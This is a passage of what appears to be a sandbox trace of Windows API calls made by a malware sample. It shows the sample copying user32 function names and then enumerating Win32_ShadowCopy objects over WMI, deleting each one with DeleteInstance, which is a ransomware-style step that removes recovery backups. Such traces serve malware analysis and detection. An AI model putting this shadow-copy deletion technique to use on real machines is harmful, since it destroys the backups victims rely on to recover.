returned="DdeCreateStringHandleA" [0055.010] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeCreateStringHandleW" | out: lpString1="DdeCreateStringHandleW") returned="DdeCreateStringHandleW" [0055.010] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeDisconnect" | out: lpString1="DdeDisconnect") returned="DdeDisconnect" [0055.010] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeDisconnectList" | out: lpString1="DdeDisconnectList") returned="DdeDisconnectList" [0055.010] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeEnableCallback" | out: lpString1="DdeEnableCallback") returned="DdeEnableCallback" [0055.010] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeFreeDataHandle" | out: lpString1="DdeFreeDataHandle") returned="DdeFreeDataHandle" [0055.010] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeFreeStringHandle" | out: lpString1="DdeFreeStringHandle") returned="DdeFreeStringHandle" [0055.010] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeGetData" | out: lpString1="DdeGetData") returned="DdeGetData" [0055.010] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeGetLastError" | out: lpString1="DdeGetLastError") returned="DdeGetLastError" [0055.010] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeGetQualityOfService" | out: lpString1="DdeGetQualityOfService") returned="DdeGetQualityOfService" [0055.010] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeImpersonateClient" | out: lpString1="DdeImpersonateClient") returned="DdeImpersonateClient" [0055.010] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeInitializeA" | out: lpString1="DdeInitializeA") returned="DdeInitializeA" [0055.010] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeInitializeW" | out: lpString1="DdeInitializeW") returned="DdeInitializeW" [0055.010] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeKeepStringHandle" | out: lpString1="DdeKeepStringHandle") returned="DdeKeepStringHandle" [0055.010] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeNameService" | out: lpString1="DdeNameService") returned="DdeNameService" [0055.010] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdePostAdvise" | out: lpString1="DdePostAdvise") returned="DdePostAdvise" [0055.010] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeQueryConvInfo" | out: lpString1="DdeQueryConvInfo") returned="DdeQueryConvInfo" [0055.010] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeQueryNextServer" | out: lpString1="DdeQueryNextServer") returned="DdeQueryNextServer" [0055.010] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeQueryStringA" | out: lpString1="DdeQueryStringA") returned="DdeQueryStringA" [0055.011] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeQueryStringW" | out: lpString1="DdeQueryStringW") returned="DdeQueryStringW" [0055.011] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeReconnect" | out: lpString1="DdeReconnect") returned="DdeReconnect" [0055.011] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeSetQualityOfService" | out: lpString1="DdeSetQualityOfService") returned="DdeSetQualityOfService" [0055.011] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeSetUserHandle" | out: lpString1="DdeSetUserHandle") returned="DdeSetUserHandle" [0055.011] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeUnaccessData" | out: lpString1="DdeUnaccessData") returned="DdeUnaccessData" [0055.011] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeUninitialize" | out: lpString1="DdeUninitialize") returned="DdeUninitialize" [0055.011] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DefDlgProcA" | out: lpString1="DefDlgProcA") returned="DefDlgProcA" [0055.011] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DefDlgProcW" | out: lpString1="DefDlgProcW") returned="DefDlgProcW" [0055.011] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DefFrameProcA" | out: lpString1="DefFrameProcA") returned="DefFrameProcA" [0055.011] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DefFrameProcW" | out: lpString1="DefFrameProcW") returned="DefFrameProcW" [0055.011] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DefMDIChildProcA" | out: lpString1="DefMDIChildProcA") returned="DefMDIChildProcA" [0055.011] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DefMDIChildProcW" | out: lpString1="DefMDIChildProcW") returned="DefMDIChildProcW" [0055.011] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DefRawInputProc" | out: lpString1="DefRawInputProc") returned="DefRawInputProc" [0055.011] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DefWindowProcA" | out: lpString1="DefWindowProcA") returned="DefWindowProcA" [0055.011] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DefWindowProcW" | out: lpString1="DefWindowProcW") returned="DefWindowProcW" [0055.011] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DeferWindowPos" | out: lpString1="DeferWindowPos") returned="DeferWindowPos" [0055.011] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DeleteMenu" | out: lpString1="DeleteMenu") returned="DeleteMenu" [0055.011] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DeregisterShellHookWindow" | out: lpString1="DeregisterShellHookWindow") returned="DeregisterShellHookWindow" [0055.011] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DestroyAcceleratorTable" | out: lpString1="DestroyAcceleratorTable") returned="DestroyAcceleratorTable" [0055.011] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DestroyCaret" | out: lpString1="DestroyCaret") returned="DestroyCaret" [0055.011] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DestroyCursor" | out: lpString1="DestroyCursor") returned="DestroyCursor" [0055.011] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DestroyIcon" | out: lpString1="DestroyIcon") returned="DestroyIcon" [0055.011] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DestroyMenu" | out: lpString1="DestroyMenu") returned="DestroyMenu" [0055.011] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DestroyReasons" | out: lpString1="DestroyReasons") returned="DestroyReasons" [0055.012] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DestroyWindow" | out: lpString1="DestroyWindow") returned="DestroyWindow" [0055.012] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DeviceEventWorker" | out: lpString1="DeviceEventWorker") returned="DeviceEventWorker" [0055.012] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DialogBoxIndirectParamA" | out: lpString1="DialogBoxIndirectParamA") returned="DialogBoxIndirectParamA" [0055.012] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DialogBoxIndirectParamAorW" | out: lpString1="DialogBoxIndirectParamAorW") returned="DialogBoxIndirectParamAorW" [0055.012] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DialogBoxIndirectParamW" | out: lpString1="DialogBoxIndirectParamW") returned="DialogBoxIndirectParamW" [0055.012] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DialogBoxParamA" | out: lpString1="DialogBoxParamA") returned="DialogBoxParamA" [0055.012] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DialogBoxParamW" | out: lpString1="DialogBoxParamW") returned="DialogBoxParamW" [0055.012] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DisableProcessWindowsGhosting" | out: lpString1="DisableProcessWindowsGhosting") returned="DisableProcessWindowsGhosting" [0055.012] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DispatchMessageA" | out: lpString1="DispatchMessageA") returned="DispatchMessageA" [0055.012] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DispatchMessageW" | out: lpString1="DispatchMessageW") returned="DispatchMessageW" [0055.012] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DisplayConfigGetDeviceInfo" | out: lpString1="DisplayConfigGetDeviceInfo") returned="DisplayConfigGetDeviceInfo" [0055.012] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DisplayConfigSetDeviceInfo" | out: lpString1="DisplayConfigSetDeviceInfo") returned="DisplayConfigSetDeviceInfo" [0055.012] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DisplayExitWindowsWarnings" | out: lpString1="DisplayExitWindowsWarnings") returned="DisplayExitWindowsWarnings" [0055.012] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DlgDirListA" | out: lpString1="DlgDirListA") returned="DlgDirListA" [0055.012] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DlgDirListComboBoxA" | out: lpString1="DlgDirListComboBoxA") returned="DlgDirListComboBoxA" [0055.012] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DlgDirListComboBoxW" | out: lpString1="DlgDirListComboBoxW") returned="DlgDirListComboBoxW" [0055.012] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DlgDirListW" | out: lpString1="DlgDirListW") returned="DlgDirListW" [0055.012] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DlgDirSelectComboBoxExA" | out: lpString1="DlgDirSelectComboBoxExA") returned="DlgDirSelectComboBoxExA" [0055.012] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DlgDirSelectComboBoxExW" | out: lpString1="DlgDirSelectComboBoxExW") returned="DlgDirSelectComboBoxExW" [0055.012] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DlgDirSelectExA" | out: lpString1="DlgDirSelectExA") returned="DlgDirSelectExA" [0055.012] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DlgDirSelectExW" | out: lpString1="DlgDirSelectExW") returned="DlgDirSelectExW" [0055.012] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DoSoundConnect" | out: lpString1="DoSoundConnect") returned="DoSoundConnect" [0055.012] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DoSoundDisconnect" | out: lpString1="DoSoundDisconnect") returned="DoSoundDisconnect" [0055.012] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DragDetect" | out: lpString1="DragDetect") returned="DragDetect" [0055.012] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DragObject" | out: lpString1="DragObject") returned="DragObject" [0055.013] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawAnimatedRects" | out: lpString1="DrawAnimatedRects") returned="DrawAnimatedRects" [0055.013] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawCaption" | out: lpString1="DrawCaption") returned="DrawCaption" [0055.013] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawCaptionTempA" | out: lpString1="DrawCaptionTempA") returned="DrawCaptionTempA" [0055.013] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawCaptionTempW" | out: lpString1="DrawCaptionTempW") returned="DrawCaptionTempW" [0055.013] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawEdge" | out: lpString1="DrawEdge") returned="DrawEdge" [0055.013] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawFocusRect" | out: lpString1="DrawFocusRect") returned="DrawFocusRect" [0055.013] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawFrame" | out: lpString1="DrawFrame") returned="DrawFrame" [0055.013] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawFrameControl" | out: lpString1="DrawFrameControl") returned="DrawFrameControl" [0055.013] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawIcon" | out: lpString1="DrawIcon") returned="DrawIcon" [0055.013] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawIconEx" | out: lpString1="DrawIconEx") returned="DrawIconEx" [0055.013] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawMenuBar" | out: lpString1="DrawMenuBar") returned="DrawMenuBar" [0055.013] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawMenuBarTemp" | out: lpString1="DrawMenuBarTemp") returned="DrawMenuBarTemp" [0055.013] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawStateA" | out: lpString1="DrawStateA") returned="DrawStateA" [0055.013] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawStateW" | out: lpString1="DrawStateW") returned="DrawStateW" [0055.013] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawTextA" | out: lpString1="DrawTextA") returned="DrawTextA" [0055.013] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawTextExA" | out: lpString1="DrawTextExA") returned="DrawTextExA" [0055.013] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawTextExW" | out: lpString1="DrawTextExW") returned="DrawTextExW" [0055.013] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawTextW" | out: lpString1="DrawTextW") returned="DrawTextW" [0055.013] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DwmGetDxSharedSurface" | out: lpString1="DwmGetDxSharedSurface") returned="DwmGetDxSharedSurface" [0055.013] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DwmStartRedirection" | out: lpString1="DwmStartRedirection") returned="DwmStartRedirection" [0055.013] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DwmStopRedirection" | out: lpString1="DwmStopRedirection") returned="DwmStopRedirection" [0055.013] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EditWndProc" | out: lpString1="EditWndProc") returned="EditWndProc" [0055.013] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EmptyClipboard" | out: lpString1="EmptyClipboard") returned="EmptyClipboard" [0055.013] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnableMenuItem" | out: lpString1="EnableMenuItem") returned="EnableMenuItem" [0055.014] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnableScrollBar" | out: lpString1="EnableScrollBar") returned="EnableScrollBar" [0055.014] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnableWindow" | out: lpString1="EnableWindow") returned="EnableWindow" [0055.014] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EndDeferWindowPos" | out: lpString1="EndDeferWindowPos") returned="EndDeferWindowPos" [0055.014] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EndDialog" | out: lpString1="EndDialog") returned="EndDialog" [0055.014] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EndMenu" | out: lpString1="EndMenu") returned="EndMenu" [0055.014] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EndPaint" | out: lpString1="EndPaint") returned="EndPaint" [0055.014] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EndTask" | out: lpString1="EndTask") returned="EndTask" [0055.014] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnterReaderModeHelper" | out: lpString1="EnterReaderModeHelper") returned="EnterReaderModeHelper" [0055.014] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumChildWindows" | out: lpString1="EnumChildWindows") returned="EnumChildWindows" [0055.014] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumClipboardFormats" | out: lpString1="EnumClipboardFormats") returned="EnumClipboardFormats" [0055.014] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumDesktopWindows" | out: lpString1="EnumDesktopWindows") returned="EnumDesktopWindows" [0055.014] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumDesktopsA" | out: lpString1="EnumDesktopsA") returned="EnumDesktopsA" [0055.014] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumDesktopsW" | out: lpString1="EnumDesktopsW") returned="EnumDesktopsW" [0055.014] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumDisplayDevicesA" | out: lpString1="EnumDisplayDevicesA") returned="EnumDisplayDevicesA" [0055.014] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumDisplayDevicesW" | out: lpString1="EnumDisplayDevicesW") returned="EnumDisplayDevicesW" [0055.014] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumDisplayMonitors" | out: lpString1="EnumDisplayMonitors") returned="EnumDisplayMonitors" [0055.014] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumDisplaySettingsA" | out: lpString1="EnumDisplaySettingsA") returned="EnumDisplaySettingsA" [0055.014] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumDisplaySettingsExA" | out: lpString1="EnumDisplaySettingsExA") returned="EnumDisplaySettingsExA" [0055.014] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumDisplaySettingsExW" | out: lpString1="EnumDisplaySettingsExW") returned="EnumDisplaySettingsExW" [0055.014] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumDisplaySettingsW" | out: lpString1="EnumDisplaySettingsW") returned="EnumDisplaySettingsW" [0055.014] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumPropsA" | out: lpString1="EnumPropsA") returned="EnumPropsA" [0055.014] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumPropsExA" | out: lpString1="EnumPropsExA") returned="EnumPropsExA" [0055.014] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumPropsExW" | out: lpString1="EnumPropsExW") returned="EnumPropsExW" [0055.014] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumPropsW" | out: lpString1="EnumPropsW") returned="EnumPropsW" [0055.015] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumThreadWindows" | out: lpString1="EnumThreadWindows") returned="EnumThreadWindows" [0055.015] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumWindowStationsA" | out: lpString1="EnumWindowStationsA") returned="EnumWindowStationsA" [0055.015] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumWindowStationsW" | out: lpString1="EnumWindowStationsW") returned="EnumWindowStationsW" [0055.015] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumWindows" | out: lpString1="EnumWindows") returned="EnumWindows" [0055.015] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EqualRect" | out: lpString1="EqualRect") returned="EqualRect" [0055.015] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ExcludeUpdateRgn" | out: lpString1="ExcludeUpdateRgn") returned="ExcludeUpdateRgn" [0055.015] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ExitWindowsEx" | out: lpString1="ExitWindowsEx") returned="ExitWindowsEx" [0055.015] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="FillRect" | out: lpString1="FillRect") returned="FillRect" [0055.015] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="FindWindowA" | out: lpString1="FindWindowA") returned="FindWindowA" [0055.015] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="FindWindowExA" | out: lpString1="FindWindowExA") returned="FindWindowExA" [0055.015] wsprintfW (in: param_1=0xf10000, param_2="Win32_ShadowCopy.ID='%s'" | out: param_1="Win32_ShadowCopy.ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'") returned 60 [0055.015] IWbemServices:DeleteInstance (in: This=0x31d0e4, strObjectPath=0xf10000, lFlags=0, pCtx=0x31cff8, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0055.884] VirtualFree (lpAddress=0xf10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.884] IUnknown:Release (This=0x31d1c0) returned 0x0 [0055.885] IEnumWbemClassObject:Next (in: This=0x31d184, lTimeout=-1, uCount=0x1, apObjects=0xc9f19c, puReturned=0xc9f18c | out: apObjects=0xc9f19c*=0x31d1c0, puReturned=0xc9f18c*=0x1) returned 0x0 [0055.887] IWbemClassObject:Get (in: This=0x31d1c0, wszName="id", lFlags=0, pVal=0xc9f1a8*(varType=0x0, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1=0x61ea34, varVal2=0x5d7480), pType=0x0, plFlavor=0x0 | out: pVal=0xc9f1a8*(varType=0x8, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1="{84D74FA3-DE98-47B0-806B-7C5805D67A02}", varVal2=0x5d7480), pType=0x0, plFlavor=0x0) returned 0x0 [0055.887] lstrlenW (lpString="Win32_ShadowCopy.id='%s'") returned 24 [0055.887] lstrlenW (lpString="{84D74FA3-DE98-47B0-806B-7C5805D67A02}") returned 38 [0055.887] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0055.888] wsprintfW (in: param_1=0xf10000, param_2="Win32_ShadowCopy.ID='%s'" | out: param_1="Win32_ShadowCopy.ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'") returned 60 [0055.888] IWbemServices:DeleteInstance (in: This=0x31d0e4, strObjectPath=0xf10000, lFlags=0, pCtx=0x31cff8, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0056.727] VirtualFree (lpAddress=0xf10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.728] IUnknown:Release (This=0x31d1c0) returned 0x0 [0056.728] IEnumWbemClassObject:Next (in: This=0x31d184, lTimeout=-1, uCount=0x1, apObjects=0xc9f19c, puReturned=0xc9f18c | out: apObjects=0xc9f19c*=0x31d1c0, puReturned=0xc9f18c*=0x1) returned 0x0 [0056.730] IWbemClassObject:Get (in: This=0x31d1c0, wszName="id", lFlags=0, pVal=0xc9f1a8*(varType=0x0, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1=0x61eabc, varVal2=0x5d7480), pType=0x0, plFlavor=0x0 | out: pVal=0xc9f1a8*(varType=0x8, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1="{1D028705-A254-45DE-BE10-D22FA08DBB3A}", varVal2=0x5d7480), pType=0x0, plFlavor=0x0) returned 0x0 [0056.730] lstrlenW (lpString="Win32_ShadowCopy.id='%s'") returned 24 [0056.730] lstrlenW (lpString="{1D028705-A254-45DE-BE10-D22FA08DBB3A}") returned 38 [0056.730] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0056.734] wsprintfW (in: param_1=0xf10000, param_2="Win32_ShadowCopy.ID='%s'" | out: param_1="Win32_ShadowCopy.ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'") returned 60 [0056.734] IWbemServices:DeleteInstance (in: This=0x31d0e4, strObjectPath=0xf10000, lFlags=0, pCtx=0x31cff8, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0057.550] VirtualFree (lpAddress=0xf10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.551] IUnknown:Release (This=0x31d1c0) returned 0x0 [0057.551] IEnumWbemClassObject:Next (in: This=0x31d184, lTimeout=-1, uCount=0x1, apObjects=0xc9f19c, puReturned=0xc9f18c | out: apObjects=0xc9f19c*=0x31d1c0, puReturned=0xc9f18c*=0x1) returned 0x0 [0057.553] IWbemClassObject:Get (in: This=0x31d1c0, wszName="id", lFlags=0, pVal=0xc9f1a8*(varType=0x0, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1=0x61ea34, varVal2=0x5d7480), pType=0x0, plFlavor=0x0 | out: pVal=0xc9f1a8*(varType=0x8, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1="{51FFEAE1-0810-4889-92A9-E72417EBFA41}", varVal2=0x5d7480), pType=0x0, plFlavor=0x0) returned 0x0 [0057.553] lstrlenW (lpString="Win32_ShadowCopy.id='%s'") returned 24 [0057.553] lstrlenW (lpString="{51FFEAE1-0810-4889-92A9-E72417EBFA41}") returned 38 [0057.553] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0057.553] GetModuleHandleA (lpModuleName="user32.dll") returned 0x74f40000 [0057.554] wsprintfW (in: param_1=0xf10000, param_2="Win32_ShadowCopy.ID='%s'" | out: param_1="Win32_ShadowCopy.ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'") returned 60 [0057.554] IWbemServices:DeleteInstance (in: This=0x31d0e4, strObjectPath=0xf10000, lFlags=0, pCtx=0x31cff8, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0058.337] VirtualFree (lpAddress=0xf10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.338] IUnknown:Release (This=0x31d1c0) returned 0x0 [0058.338] IEnumWbemClassObject:Next (in: This=0x31d184, lTimeout=-1, uCount=0x1, apObjects=0xc9f19c, puReturned=0xc9f18c | out: apObjects=0xc9f19c*=0x31d1c0, puReturned=0xc9f18c*=0x1) returned 0x0 [0058.340] IWbemClassObject:Get (in: This=0x31d1c0, wszName="id", lFlags=0, pVal=0xc9f1a8*(varType=0x0, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1=0x61eabc, varVal2=0x5d7480), pType=0x0, plFlavor=0x0 | out: pVal=0xc9f1a8*(varType=0x8, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1="{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}", varVal2=0x5d7480), pType=0x0, plFlavor=0x0) returned 0x0 [0058.340] lstrlenW (lpString="Win32_ShadowCopy.id='%s'") returned 24 [0058.340] lstrlenW (lpString="{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}") returned 38 [0058.340] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0058.341] wsprintfW (in: param_1=0xf10000, param_2="Win32_ShadowCopy.ID='%s'" | out: param_1="Win32_ShadowCopy.ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'") returned 60 [0058.341] IWbemServices:DeleteInstance (in: This=0x31d0e4, strObjectPath=0xf10000, lFlags=0, pCtx=0x31cff8, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0059.181] VirtualFree (lpAddress=0xf10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.182] IUnknown:Release (This=0x31d1c0) returned 0x0 [0059.182] IEnumWbemClassObject:Next (in: This=0x31d184, lTimeout=-1, uCount=0x1, apObjects=0xc9f19c, puReturned=0xc9f18c | out: apObjects=0xc9f19c*=0x31d1c0, puReturned=0xc9f18c*=0x1) returned 0x0 [0059.184] IWbemClassObject:Get (in: This=0x31d1c0, wszName="id", lFlags=0, pVal=0xc9f1a8*(varType=0x0, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1=0x61ea34, varVal2=0x5d7480), pType=0x0, plFlavor=0x0 | out: pVal=0xc9f1a8*(varType=0x8, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1="{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}", varVal2=0x5d7480), pType=0x0, plFlavor=0x0) returned 0x0 [0059.184] lstrlenW (lpString="Win32_ShadowCopy.id='%s'") returned 24 [0059.184] lstrlenW (lpString="{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}") returned 38 [0059.184] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0059.185] wsprintfW (in: param_1=0xf10000, param_2="Win32_ShadowCopy.ID='%s'" | out: param_1="Win32_ShadowCopy.ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'") returned 60 [0059.185] IWbemServices:DeleteInstance (in: This=0x31d0e4, strObjectPath=0xf10000, lFlags=0, pCtx=0x31cff8, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0060.024] VirtualFree (lpAddress=0xf10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.025] IUnknown:Release (This=0x31d1c0) returned 0x0 [0060.025] IEnumWbemClassObject:Next (in: This=0x31d184, lTimeout=-1, uCount=0x1, apObjects=0xc9f19c, puReturned=0xc9f18c | out: apObjects=0xc9f19c*=0x31d1c0, puReturned=0xc9f18c*=0x1) returned 0x0 [0060.027] IWbemClassObject:Get (in: This=0x31d1c0, wszName="id", lFlags=0, pVal=0xc9f1a8*(varType=0x0, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1=0x61eabc, varVal2=0x5d7480), pType=0x0, plFlavor=0x0 | out: pVal=0xc9f1a8*(varType=0x8, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1="{05121166-67F2-4EA9-83D8-EDC08F680DA7}", varVal2=0x5d7480), pType=0x0, plFlavor=0x0) returned 0x0 [0060.027] lstrlenW (lpString="Win32_ShadowCopy.id='%s'") returned 24 [0060.027] lstrlenW (lpString="{05121166-67F2-4EA9-83D8-EDC08F680DA7}") returned 38 [0060.027] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0060.030] wsprintfW (in: param_1=0xf10000, param_2="Win32_ShadowCopy.ID='%s'" | out: param_1="Win32_ShadowCopy.ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'") returned 60 [0060.030] IWbemServices:DeleteInstance (in: This=0x31d0e4, strObjectPath=0xf10000, lFlags=0, pCtx=0x31cff8, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0060.801] VirtualFree (lpAddress=0xf10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.802] IUnknown:Release (This=0x31d1c0) returned 0x0 [0060.802] IEnumWbemClassObject:Next (in: This=0x31d184, lTimeout=-1, uCount=0x1, apObjects=0xc9f19c, puReturned=0xc9f18c | out: apObjects=0xc9f19c*=0x31d1c0, puReturned=0xc9f18c*=0x1) returned 0x0 [0060.804] IWbemClassObject:Get (in: This=0x31d1c0, wszName="id", lFlags=0, pVal=0xc9f1a8*(varType=0x0, 